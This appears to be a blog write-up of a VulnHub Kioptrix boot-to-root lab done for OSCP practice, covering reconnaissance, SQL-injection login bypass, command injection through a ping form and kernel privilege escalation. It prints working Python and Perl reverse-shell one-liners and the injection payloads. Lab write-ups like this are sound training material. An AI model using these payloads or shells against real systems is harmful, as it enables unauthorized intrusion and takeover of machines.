The machine

This machine is one of the machines from the OSCP preparation guide I received from one of my teachers. This machine is the next on list and it can be downloaded from: vulnhub

The challenge

The challenge or goal of the machine lists the following:

The object of the game is to acquire root access via any means possible (except actually hacking the VM server or player).

https://www.vulnhub.com/entry/kioptrix-level-11-2,23/

Walk-through

The walk-through will be divided in a couple sections following the standard penetration testing process: Information gathering –> Exploitation –> Post exploitation. It could be divided into more steps, but for complicity we do these three.

Information gathering

To start of we will find the IP address of the machine with nmap since netdiscover takes a while on my VMware. We will use the command nmap -sn 192.168.0.0/24 for this. I could not find the machine since the adapter keeps switching back to Bridge mode. I had to start the machine, add another network adapter, remove the old adapter and restart the machine. It stayed NAT, nice! The nmap scan shows us the machine has the IP 192.168.0.132.

To start of lets do a nmap and a full port nmap scan with the following commands: nmap -sV -sC -vv 192.168.0.132 -oA kioptrix2/nmap & nmap -sV -sC -p- 192.168.0.132 -oA kioptrix2/fullnmap. While the first one is running we can see that port 80 is open. Lets start Dirb and Nikto to find some more information about the webserver. We use the commands nikto -host http://192.168.0.132 -output kioptrix2/nikto.txt and dirb http://192.168.0.132 -o kioptrix2/dirb.txt

While these are running, lets have a look at our nmap results:

Nmap results

So we got port 22 for SSH, port 80 and 443 for webservices, again port 111 for rpcbind. There is port 631 for ipp cups 1.1? and port 3306 for mysql which might be available for unauthorized access. Lets have a look at mysql first, seems interesting. But we get a not allowed error. Seems like it gives the unauthorized error if we aren’t allowed to connect to it. Learned something new. Lets go on

Before we look into the obvious webserver which we already scanned with Nikto and Dirb. Lets see what this port 631 cups is and if there is any exploit. Cups is “CUPS is the standards-based, open source printing system developed by Apple Inc. for macOS® and other UNIX®-like operating systems. CUPS uses the Internet Printing Protocol (IPP) to support printing to local and network printers.” from the cups website. It is a printing service with version 1.1. If we do a searchsploit cups we can see several exploits.

Exploitation

While looking at the exploit list when we did searchsploit cups we want to skip any denial of service attacks. There is one exploit that seems good to what we want: Remote Command Execution. So lets copy this file to our directory searchsploit -m exploits/linux/remote/41233.py and see the contents of it. We can see some parameters which we need to use.

contents of 41233.py

Running the script doesn’t give us much, there is no printers available. Seems like a dead end for now.

Back to information gathering

The exploit didn’t work. So back to information gathering. We already did a dirb scan and Nikto scan. These should be done so we can have a look at the results. The nikto results can be seen below, it doesn’t give us any interesting things to look at. Although the Query strings might be interesting to look at later.

Nikto results

Lets have a look at the Dirb results. I didn’t found anything interesting, it scanned a lot of manuals in the /manual/ directory.

Dirb results

Time to manually go to the website in our Firefox browser and have a look what it looks like.

The login screen of webserver

Exploitation

So we got a login screen, back to exploiting. Lets try some basic sql injections like ' or 1=1 # and ' or 1=1 --. We got access in the first try. YEAH, this was easy! We got another webpage with the availability to ping to a machine in the network.

Index.php

If we fill in our IP and click on submit, we can see that it pings our machine three times.

After inputting an IP adress

We can maybe inject some of our own commands in here. Lets to submit and IP and the id and whoami. The payload looks like this 192.168.0.129 && id && whoami. As the result we see the output of the ping and the output of the id and whoami command.

After injecting our own commands

Interesting, lets try if we can get a reverse shell. Lets see if netcat is one the machine, after submitting 192.168.0.129 && nc -h we get no response. Is there python? Lets try 192.168.0.129 && python -h and we get a help response from python. Good! We can use the following code to get a reverse python shell, took it from pentestmonkey.

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Lets start a listener and then we inject this code to see if we get a reverse shel. On our host machine we use nc -lvp 1234 to start the listener. Use the code and…. nothing. We didn’t get a shell. Lets try another thing. If we do perl -h we can see that Perl is on the target machine. We can try a perl reverse shell with the code:

perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

After injecting it like we did before we got a reverse shell with no job control as the apache user.

Post exploitation

We got access to the machine but we aren’t root yet. We are the apache user with a limited shell. Lets break out of this limited shell, I normally use the top commands from this website. The first one seems to work fine 🙂 python -c 'import pty; pty.spawn("/bin/sh")'.

Remember when we were looking at the Cups running on port 631? There was a priv escalation exploit when we searched for possible exploits. Lets have a look what user is running the Cups print service. To see the running services we can use the ps aux command. To just see the cups service we can pipe the output and grep the word cups. Like ps aux | grep cups. And it is running as root!

So lets have another look at the searchsploit results when we look for cups. with the command searchsploit cups.

The row "CUPS < 1.3.8-4 - Local Privilege Escalation | exploits/multiple/local/7550.c" seems interesting. So lets copy this code with the searchsploit -m exploits/multiple/local/7550.c command. But to get this code to our target machine we have to copy this code to our /var/www/html directory, turn on apache and then we can wget it from our target machine. To copy the file use sudo cp 7550.c /var/www/html/, to turn on apache sudo /etc/init.d/apache2 start and to download the file wget http://192.168.0.129/7550.c

Now we need to compile the code with gcc since its c code. gcc 7550.c -o exploit

Normally I have a look at the code before I compile it. But lets quickly have a look on our attacking system before we run it. It doesn’t show us anything interesting just a POC.

part of contents from 7550.c

Lets run it and we got a couple errors, we are also not root. So it didn’t work.

After some googling, I found out that there is no default printer set. We can use the lpstat -l command to confirm this. Since we have no sudo rights I can not set a default printer. Seems like a dead end.

After some manual priv escalation enumeration I found out that the machine is running CentOS 4.5 Final and the Kernel version 2.6.9-55.EL.

Release and kernal version commands

There are several kernel exploits for CentOS. Including one that should work on our machine.

Lets try this one. We can bring it to our target machine like the other exploit we tried. Through our apache server.

Getting the exploit code to our target machine.

We got errors during compiling, but after checking in the code its unlikely this one will work since it requires more then 32gb of ram otherwise its unlikely to work (as stated in the commented text). After running a couple kernel exploits I found the one that worked. It was 9452.c which was listed in the searchsploit search we did earlier. (The one highlighted below)

Searchsploit results with highlighted exploit

We exported this exploit, copied it to our /var/www/html folder and downloaded it on our target. Then we compiled it with gcc just like our previous exploits. We ran it and we are root!

We got root

Leave a Reply

Your email address will not be published. Required fields are marked *